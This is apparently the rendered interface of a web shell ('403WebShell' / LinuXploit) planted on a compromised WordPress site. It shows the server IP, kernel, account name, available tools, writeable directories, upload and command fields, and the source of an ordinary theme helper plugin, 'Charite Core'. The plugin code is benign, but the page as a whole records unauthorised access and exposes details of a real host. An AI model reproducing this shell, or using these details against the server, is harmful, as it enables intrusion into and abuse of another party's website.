Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.188.62.10
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/home/wavevlvu/tacafoundation.org/wp-content/plugins/charite-core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/wavevlvu/tacafoundation.org/wp-content/plugins/charite-core/charite-core.php
<?php

/**
 * @package Charite Core
 * @version 1.0.1
 */
/*
Plugin Name: Charite Core
Plugin URI:
Description: This is a helper plugin for Charite  Theme
Author: SolverWp
Version: 1.0.0
Author URI:https://solverwp.com/
*/
/**  Related Theme Type */

global $related_theme_type;
$related_theme_type = array('CHARITE', 'Charite Child');
//define current theme name
$current_theme = !empty(wp_get_theme()) ? wp_get_theme()->get('Name') : '';
define('CURRENT_THEME_NAME', $current_theme);


/*
 * Define Plugin Dir Path
 * @since 1.0.0
 * */
define('CHARITE_CORE_SELF_PATH', 'charite-core/charite-core.php');
define('CHARITE_CORE_ROOT_PATH', plugin_dir_path(__FILE__));
define('CHARITE_CORE_ROOT_URL', plugin_dir_url(__FILE__));
define('CHARITE_CORE_LIB', CHARITE_CORE_ROOT_PATH . '/lib');
define('CHARITE_CORE_INC', CHARITE_CORE_ROOT_PATH . '/inc');
define('CHARITE_CORE_ADMIN', CHARITE_CORE_INC . '/admin');
define('CHARITE_CORE_ADMIN_ASSETS', CHARITE_CORE_ROOT_URL . 'inc/admin/assets');
define('CHARITE_CORE_CSS', CHARITE_CORE_ROOT_URL . 'assets/css');
define('CHARITE_CORE_IMG', CHARITE_CORE_ROOT_URL . 'assets/img');
define('CHARITE_CORE_JS', CHARITE_CORE_ROOT_URL . 'assets/js');
define('CHARITE_CORE_ELEMENTOR', CHARITE_CORE_INC . '/elementor');
define('CHARITE_CORE_SHORTCODES', CHARITE_CORE_INC . '/shortcodes');
define('CHARITE_CORE_WIDGETS', CHARITE_CORE_INC . '/widgets');

/** Plugin version **/
define('CHARITE_CORE_VERSION', '1.0.0');


//plugin core file include
if (file_exists(CHARITE_CORE_INC . '/class-charite-core-init.php')) {
	require_once CHARITE_CORE_INC . '/class-charite-core-init.php';
}


/**
 * Load plugin textdomain.
 */
add_action('plugins_loaded', 'charite_core_language');
if (!function_exists('charite_core_language')) {

	function charite_core_language()
	{
		load_plugin_textdomain('charite-core', false, plugin_basename(dirname(__FILE__)) . '/language');
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit